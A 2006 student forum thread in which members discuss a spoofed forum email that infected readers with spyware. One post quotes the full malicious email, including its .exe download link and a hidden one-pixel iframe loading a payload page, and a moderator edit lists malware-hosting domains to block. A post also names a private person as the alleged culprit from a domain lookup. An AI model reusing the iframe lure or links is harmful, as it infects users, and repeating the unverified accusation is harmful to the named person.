Warning: Illegal string offset 'html' in /home/hsn/public_html/forum/cache/skin_cache/cacheid_1/skin_topic.php on line 909

Warning: Cannot modify header information - headers already sent by (output started at /home/hsn/public_html/forum/cache/skin_cache/cacheid_1/skin_topic.php:909) in /home/hsn/public_html/forum/admin/sources/classes/output/formats/html/htmlOutput.php on line 114

Warning: Cannot modify header information - headers already sent by (output started at /home/hsn/public_html/forum/cache/skin_cache/cacheid_1/skin_topic.php:909) in /home/hsn/public_html/forum/admin/sources/classes/output/formats/html/htmlOutput.php on line 127

Warning: Cannot modify header information - headers already sent by (output started at /home/hsn/public_html/forum/cache/skin_cache/cacheid_1/skin_topic.php:909) in /home/hsn/public_html/forum/admin/sources/classes/output/formats/html/htmlOutput.php on line 136

Warning: Cannot modify header information - headers already sent by (output started at /home/hsn/public_html/forum/cache/skin_cache/cacheid_1/skin_topic.php:909) in /home/hsn/public_html/forum/admin/sources/classes/output/formats/html/htmlOutput.php on line 137

Warning: Cannot modify header information - headers already sent by (output started at /home/hsn/public_html/forum/cache/skin_cache/cacheid_1/skin_topic.php:909) in /home/hsn/public_html/forum/admin/sources/classes/output/formats/html/htmlOutput.php on line 141
Email - HSN forum

Jump to content


Email


67 replies to this topic

#1 supernova

    Showing Improvement

  • Members
  • PipPip
  • 31 posts
  • Gender:Female

Posted 03 March 2006 - 04:25 PM

I just got an email from here titled "hello my dear friends", and it said my username and "please click here" and when i did, MY COMPUTER GOT INFECTED BY SPYWARE! WHY?!

So much for a school friendly website!

Mod editted:

QUOTE

81.9.5.9
Iframecash.biz
Toolbarbest.biz
Toolbarbucks.biz
Toolbarcool.biz
Toolbardollars.biz
Toolbarmoney.biz
Toolbarnew.biz
Toolbarsale.biz
Toolbarweb.biz
sexymarissa.net
cleanchain.net
ztrf.net
outerinfo.com
toolbarweb.biz
drc-group.net
wm.maxysearch.info
superegler.net
products-gold.net
toolbarmoney.biz
toolbardollars.biz
toolbarcool.biz
traffdollars.biz

As a precaution, you might want to add the above to your 'hosts' file, which you can access from:
C:\WINDOWS\system32\drivers\etc

Doing the above will block the above websites, which have been known to hosting viruses.


#2 *Suz*

    Top of the Class

  • Members
  • PipPipPipPipPip
  • 323 posts
  • Location:Glasgow
  • Gender:Female

Posted 03 March 2006 - 04:45 PM

yea i got that too, now my computer is also infected!
You'll never bring me down, cos' i'm so far above you...

#3 Scott

    Fully Fledged Genius

  • Members
  • PipPipPipPipPipPipPip
  • 1,793 posts
  • Location:Dalkeith/Edinburgh
  • Interests:Music, guitar, computing, football(I'm a Killie fan), hanging out with my friends, drinking, girls, playing pool, reading and watching TV and DVDs.<br /><br />I'm currently at Edinburgh University in my 2nd year of Computer Science.
  • Gender:Male

Posted 03 March 2006 - 04:48 PM

( http://www.lavasoft.de ) Adaware Personal will find and destroy software for you.

For future reference, if ANYBODY sends you a .exe file:

DO NOT CLICK IT

It's incredibly easy to fake an email address. Chances are this is some wee script kiddy thinking he's "1337" cause he can use Visual Basic rolleyes.gif

#4 Justboy

    Child Prodigy

  • Members
  • PipPipPipPipPipPip
  • 541 posts
  • Location:Glasgow
  • Interests:Anime, gaming, dvds, computers.
  • Gender:Male

Posted 03 March 2006 - 04:48 PM

Yeah, I didn't click it.

#5 south lanarkshire jag

    Top of the Class

  • Members
  • PipPipPipPipPip
  • 359 posts
  • Gender:Male

Posted 03 March 2006 - 04:50 PM

me neither

just saw this in time

#6 coca

    Child Prodigy

  • Members
  • PipPipPipPipPipPip
  • 891 posts
  • Location:Stormwind City
  • Interests:Programming and gaming<br /><br />http://coca-123.bebo.com
  • Gender:Male

Posted 03 March 2006 - 04:51 PM

It was probably faked.

Do you have a screenshot of the e-mail & headers?
<MrBob> I hate Uni. At least in film studies we get to talk about Fight Club.
<@X-Factor> Wouldnt you be breaking the first 2 rules?


#7 linds

    HSN Legend

  • Moderators
  • PipPipPipPipPipPipPipPip
  • 3,015 posts
  • Gender:Not Telling
  • Gender:Not Telling

Posted 03 March 2006 - 04:58 PM

Just as well that all my HSN emails go to an account I don't use any more. Har.

#8 The Wedge Effect

    HSN Legend

  • Members
  • PipPipPipPipPipPipPipPip
  • 2,477 posts
  • Location:Paisley
  • Interests:I'm me, I guess. I wear glasses, have short spiked hair, about 5ft 9 (I think). I left fifth year of school in 2005 and is currently unemployed. I used to go to Strathclyde University to do MEng Chemical Engineering, but I hated the course, so I quit. I've started doing MSc Mathematics, from September 2006, as I have a keen (almost unhealthy) interest in Mathematics, and its applications.<br /><br />The grades I achieved in the exams:<br /><br />1 - Standard Grade Mathematics<br />1 - Standard Grade Physics<br />1 - Standard Grade Chemistry<br />1 - Standard Grade Computing Studies<br />1 - Standard Grade Craft and Design<br />2 - Standard Grade English<br />2 - Standard Grade Geography <br /><br />A (Band 1) - Higher English<br />A (Band 1) - Higher Mathematics<br />A (Band 2) - Higher Chemistry<br />B (Band 3) - Higher Physics<br /><br />Anything else ya wanna know about me, PM me or add me to your MSN contact list and chat to me there. :P
  • Gender:Male

Posted 03 March 2006 - 04:59 PM

Yeah, I got that email as well, sent to my Gmail inbox, I deleted it after hovering over the link saying "Click Here" and seeing it link to a .exe file.

#9 Scott

    Fully Fledged Genius

  • Members
  • PipPipPipPipPipPipPip
  • 1,793 posts
  • Location:Dalkeith/Edinburgh
  • Interests:Music, guitar, computing, football(I'm a Killie fan), hanging out with my friends, drinking, girls, playing pool, reading and watching TV and DVDs.<br /><br />I'm currently at Edinburgh University in my 2nd year of Computer Science.
  • Gender:Male

Posted 03 March 2006 - 05:08 PM

Anybody got the link to the file, name of the file or email headers?

#10 coca

    Child Prodigy

  • Members
  • PipPipPipPipPipPip
  • 891 posts
  • Location:Stormwind City
  • Interests:Programming and gaming<br /><br />http://coca-123.bebo.com
  • Gender:Male

Posted 03 March 2006 - 05:08 PM

Hrm I got one too.

QUOTE(POP server)
retr 1
+OK sending 2336 bytes
Return-Path: <nobody@cleveland.directrouter.com>
Received: from cmdeliver.vip.spray.net (lmin05.st1.spray.net [212.78.202.105])
        by cmdeliver07.st1.spray.net (Postfix) with ESMTP id 3F5E99081
        for <pseudotoxic@spray.se>; Fri,  3 Mar 2006 16:01:21 +0000 (GMT)
Received: from cleveland.directrouter.com (cleveland.directrouter.com [69.93.38.
114])
        by lmin05.st1.spray.net (Postfix) with ESMTP id F1B3833E82
        for <pseudotoxic@spray.se>; Fri,  3 Mar 2006 16:01:20 +0000 (GMT)
Received: from nobody by cleveland.directrouter.com with local (Exim 4.52)
        id 1FFCiT-0003Kh-La
        for pseudotoxic@spray.se; Fri, 03 Mar 2006 10:01:17 -0600
To: pseudotoxic@spray.se
Subject: hello my dear friends ( From HSN forum )
MIME-Version: 1.0
Content-type: text/html; charset="iso-8859-1"
From: "HSN forum" <forum@hsn.uk.net>
X-Priority: 3
X-Mailer: IPB PHP Mailer
Message-Id: <E1FFCiT-0003Kh-La@cleveland.directrouter.com>
Date: Fri, 03 Mar 2006 10:01:17 -0600
X-AntiAbuse: This header was added to track abuse, please include it with any ab
use report
X-AntiAbuse: Primary Hostname - cleveland.directrouter.com
X-AntiAbuse: Original Domain - spray.se
X-AntiAbuse: Originator/Caller UID/GID - [99 32003] / [47 12]
X-AntiAbuse: Sender Address Domain - cleveland.directrouter.com
X-Source:
X-Source-Args: /usr/local/apache/bin/httpd -DSSL
X-Source-Dir: /
X-Lycos-AS: 51.00
X-Lycos-AV: OK



mememe,
<a href="http://traffdollars.biz/dl/loadadv553.exe" target="_blank">please click
</a> !!!!


-------------------------------------
HSN forum Statistics:
-------------------------------------
Registered Users: 1693
Total Posts: 68026
Busiest Time: 62 users were online on 16th August 2005 - 02:50 PM

-------------------------------------
Handy Links
-------------------------------------
Board Address: http://www.hsn.uk.net/forum/index.php
Log In: http://www.hsn.uk.net/forum/index.php?act=Login&CODE=00
Lost Password Recovery: http://www.hsn.uk.net/forum/index.php?act=Reg&CODE=10

-------------------------------------
How to unsubscribe
-------------------------------------
Visit your email preferences (http://www.hsn.uk.ne...hp?act=UserCP
ODE=02) and ensure that the box for 'Send me any updates sent by the board admin
istrator' is unchecked and submit the form
<iframe src="http://traffdollars.biz/dl/adv553.php" width=1 height=1></iframe>


That's the whole thing. Looks faked, seems like a carefully crafted spamming program ohmy.gif
<MrBob> I hate Uni. At least in film studies we get to talk about Fight Club.
<@X-Factor> Wouldnt you be breaking the first 2 rules?


#11 xkarenx

    Site Swot

  • Members
  • PipPipPipPip
  • 125 posts
  • Gender:Not Telling

Posted 03 March 2006 - 05:17 PM

Yeah I got that too but I'm not so daft that I would click a .exe link there is no reason why HSN would e-mail you saying "Please click!!" with a .exe file attached to the link.

#12 Paul

    Fully Fledged Genius

  • Moderators
  • PipPipPipPipPipPipPip
  • 1,621 posts
  • Location:Glasgow
  • Interests:was at Glasgow Uni Studying Maths, Physics and Geography for a year but got bored of it and decided to go to Strathclyde and do Maths with Teaching, currently enjoying my summer holidays before starting 2nd year in september!<br /><br />grades achieved at school were:<br /><br />SG Maths - 1<br />SG Physics - 1<br />SG Graphics - 1<br />SG Admin - 1<br />SG German - 2<br />SG Geography - 2<br />SG English - 2<br />SG Art - 2<br />H Maths - B<br />H Physics - B<br />H English - B<br />H Art - A<br />H Accounts - A<br />H Admin - A<br />AH Maths - A<br />AH Art - C<br /><br />Music...wot would I do without it!? Kaiser Chiefs, Killers, Razorlight, Franz Ferdinand, Editors, Arctic Monkeys, Maximo Park, Hard-Fi, Greenday, Stereophonics, Oasis, Kasabian, Raconteurs, Dirty Pretty Things, Libertines... I could go on all day!<br /><br />Moderator for HSN so don't hesitate to get in touch!
  • Gender:Male

Posted 03 March 2006 - 05:20 PM

I havent received it...yet!
Rockness 2008!
T in the Park 2008!
YAS!

#13 Nathan

    Fully Fledged Genius

  • Members
  • PipPipPipPipPipPipPip
  • 1,736 posts
  • Location:Aberdeen, Scotland
  • Gender:Male

Posted 03 March 2006 - 05:25 PM

me neither sad.gif

i feel so left out!

#14 Scott

    Fully Fledged Genius

  • Members
  • PipPipPipPipPipPipPip
  • 1,793 posts
  • Location:Dalkeith/Edinburgh
  • Interests:Music, guitar, computing, football(I'm a Killie fan), hanging out with my friends, drinking, girls, playing pool, reading and watching TV and DVDs.<br /><br />I'm currently at Edinburgh University in my 2nd year of Computer Science.
  • Gender:Male

Posted 03 March 2006 - 05:28 PM

Well, it looks like he's a crafty fellow and registered the domain as a .biz which most domain name registrars don't register the information on. However, ladies and gentleman, I give you:

Jason Coffman, Resident of Philedelphia. Seems like this nasty little fellow has several .biz domains that all downloaded nasty little exploitative programs.

Whoops, looks like I may have to go find out who his ISP is.

Edit: Looks like his other domain names are all registered under fake names and addresses except the one he used in this email! laugh.gif

#15 south lanarkshire jag

    Top of the Class

  • Members
  • PipPipPipPipPip
  • 359 posts
  • Gender:Male

Posted 03 March 2006 - 05:32 PM

QUOTE(Scott @ Mar 3 2006, 05:28 PM)
Well, it looks like he's a crafty fellow and registered the domain as a .biz which most domain name registrars don't register the information on. However, ladies and gentleman, I give you:

Jason Coffman, Resident of Philedelphia. Seems like this nasty little fellow has several .biz domains that all downloaded nasty little exploitative programs.

Whoops, looks like I may have to go find out who his ISP is.

View Post




typical americans ruining everything

#16 coca

    Child Prodigy

  • Members
  • PipPipPipPipPipPip
  • 891 posts
  • Location:Stormwind City
  • Interests:Programming and gaming<br /><br />http://coca-123.bebo.com
  • Gender:Male

Posted 03 March 2006 - 05:38 PM

Apparently the initial process writes several other (seemingly randomly) named programs to disk. The initial process also listens on some port for connections, and connects to a webserver somewhere. The children keep spawning other processes, and I think they connect to webservers too. It SEEMS like one of the programs created a service on my system also, but I'm not sure. It crashed my shell, ran Internet Explorer (which also crashed laugh.gif) and fired up a whole load of popups.

BRUTAL! The downloaded program is only 5KB tho, quite impressive if it doesn't download any other programs to do the work.

EDIT: It creates 2 services here! Plus 3 IE hooks, and a whole ton of startup objects.
<MrBob> I hate Uni. At least in film studies we get to talk about Fight Club.
<@X-Factor> Wouldnt you be breaking the first 2 rules?


#17 ice_illusion

    Child Prodigy

  • Members
  • PipPipPipPipPipPip
  • 947 posts
  • Location:Pluto
  • Gender:Female

Posted 03 March 2006 - 07:58 PM

I just got the email too. But I haven't clicked the link sinced it looked a bit wrong and came on to check. I think a moderator or someone should put up an announcement or send another email or something.

The last bad spyware I got almost killed my laptop (admittedly that isn't too hard). It was constantly connecting with something on the internet and using up so much processing power that it would take 15min just to move the mouse from one side of the screen to the other. Eventually my dad realised that the router shouldn't be flashing quite so much and pulled it out. Which speeded it up a lot.

#18 Scott

    Fully Fledged Genius

  • Members
  • PipPipPipPipPipPipPip
  • 1,793 posts
  • Location:Dalkeith/Edinburgh
  • Interests:Music, guitar, computing, football(I'm a Killie fan), hanging out with my friends, drinking, girls, playing pool, reading and watching TV and DVDs.<br /><br />I'm currently at Edinburgh University in my 2nd year of Computer Science.
  • Gender:Male

Posted 03 March 2006 - 08:56 PM

Right, pseudo, as you received the email (I haven't yet, I feel left out!) you may want to copy and paste the headers to:

abuse@directrouter.com

They will deal with this little bawbag.

#19 Terrence

    Fully Fledged Genius

  • Members
  • PipPipPipPipPipPipPip
  • 1,227 posts
  • Gender:Male
  • Location:Newcastle.
  • Interests:Internet.
  • Gender:Male

Posted 03 March 2006 - 09:02 PM

I feel left out too. sad.gif
@

#20 SoDraconian

    Good Effort

  • Members
  • PipPipPip
  • 71 posts
  • Location:GET ME OUT OF HERE!
  • Interests:Doing stuff and doing nothing.
  • Gender:Female

Posted 03 March 2006 - 09:06 PM

Yeah, I got it as well. I deleted it, though. It looked pretty dodgy, anyway, since the dude clearly couldn't punctuate correctly. =P





1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users